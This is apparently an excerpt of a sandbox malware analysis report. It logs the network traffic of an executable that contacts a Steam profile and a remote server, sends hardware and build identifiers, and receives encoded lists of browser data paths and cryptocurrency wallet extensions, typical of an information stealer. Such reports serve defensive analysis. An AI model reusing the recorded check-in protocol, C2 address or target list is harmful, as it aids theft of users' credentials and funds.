                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.138988018 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.139194012 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.139204025 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.184135914 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.184195995 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.184273958 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.184508085 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.184524059 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.063517094 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.063596010 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.064039946 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.064049006 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.065768957 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.065776110 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.742535114 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.742701054 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.742710114 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.742774010 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.742958069 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.742978096 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.744303942 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.744345903 CEST4434998795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.744442940 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.744750023 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.744770050 CEST4434998795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:37.609251976 CEST4434998795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:37.609359026 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:37.609863043 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:37.609875917 CEST4434998795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:37.611670971 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:37.611685038 CEST4434998795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:38.286525011 CEST4434998795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:38.286657095 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:38.286679983 CEST4434998795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:38.286703110 CEST4434998795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:38.286818981 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:38.286818981 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:38.286818981 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:38.585789919 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:38.585822105 CEST4434998795.217.220.103192.168.2.4

                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          Oct 23, 2024 17:05:23.262243986 CEST5963553192.168.2.41.1.1.1
                                                                                                                                                                                                                          Oct 23, 2024 17:05:23.270323992 CEST53596351.1.1.1192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:38.302584887 CEST6074853192.168.2.41.1.1.1
                                                                                                                                                                                                                          Oct 23, 2024 17:06:38.312834978 CEST53607481.1.1.1192.168.2.4

                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Oct 23, 2024 17:05:23.262243986 CEST192.168.2.41.1.1.10xf0feStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Oct 23, 2024 17:06:38.302584887 CEST192.168.2.41.1.1.10x3a5bStandard query (0)cowod.hopto.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Oct 23, 2024 17:05:23.270323992 CEST1.1.1.1192.168.2.40xf0feNo error (0)steamcommunity.com92.122.104.90A (IP address)IN (0x0001)false

                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                                                          • 95.217.220.103

                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          0192.168.2.44974392.122.104.904435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:05:24 UTC119OUTGET /profiles/76561199786602107 HTTP/1.1
                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:05:24 UTC1891INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://ste [TRUNCATED]
                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:05:24 GMT
                                                                                                                                                                                                                          Content-Length: 34570
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: sessionid=7c92fea456f6ef5b36f1b205; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7Cb9e7f3651c38ac41ccf738a8ba3498dc; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                          2024-10-23 15:05:24 UTC14493INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                          2024-10-23 15:05:24 UTC10083INData Raw: 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c
                                                                                                                                                                                                                          Data Ascii: tipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global
                                                                                                                                                                                                                          2024-10-23 15:05:24 UTC9994INData Raw: 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 70 75 62 6c 69 63 5c 2f 73 68 61 72 65 64 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74
                                                                                                                                                                                                                          Data Ascii: static.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quot;:&quot;https:\/\/community.steamstatic.com\/public\/shared\/&quot;,&quot;COMMUNITY_BASE_URL&quot;:&quot


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          1192.168.2.44974595.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:05:26 UTC187OUTGET / HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:05:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:05:26 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:05:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          2192.168.2.44974795.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:05:28 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DHCFIDAKJDHIECBFCBKK
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 255
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:05:28 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 46 49 44 41 4b 4a 44 48 49 45 43 42 46 43 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 39 32 34 33 34 32 37 34 38 35 33 30 32 35 39 39 37 34 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 46 49 44 41 4b 4a 44 48 49 45 43 42 46 43 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 46 49 44 41 4b 4a 44 48 49 45 43 42 46 43 42 4b 4b 2d 2d 0d 0a
                                                                                                                                                                                                                          Data Ascii: ------DHCFIDAKJDHIECBFCBKKContent-Disposition: form-data; name="hwid"E49243427485302599741-a33c7340-61ca------DHCFIDAKJDHIECBFCBKKContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------DHCFIDAKJDHIECBFCBKK--
                                                                                                                                                                                                                          2024-10-23 15:05:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:05:28 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:05:28 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 3a1|1|1|1|62641dabf289ea94f769f60cef180c7e|1|1|1|0|0|50000|10


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          3192.168.2.44974895.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:05:29 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFB
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:05:29 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------BAEBGCFIEHCFIDGCAAFBCont
                                                                                                                                                                                                                          2024-10-23 15:05:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:05:30 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:05:30 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                          Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          4192.168.2.44974995.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:05:31 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFH
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:05:31 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------BKKKEGIDBGHIDGDHDBFHCont
                                                                                                                                                                                                                          2024-10-23 15:05:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:05:31 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:05:31 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                          Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          5192.168.2.44975095.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:05:32 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHII
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 332
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:05:32 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------IEHCAKKJDBKKFHJJDHIICont
                                                                                                                                                                                                                          2024-10-23 15:05:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:05:33 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:05:33 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
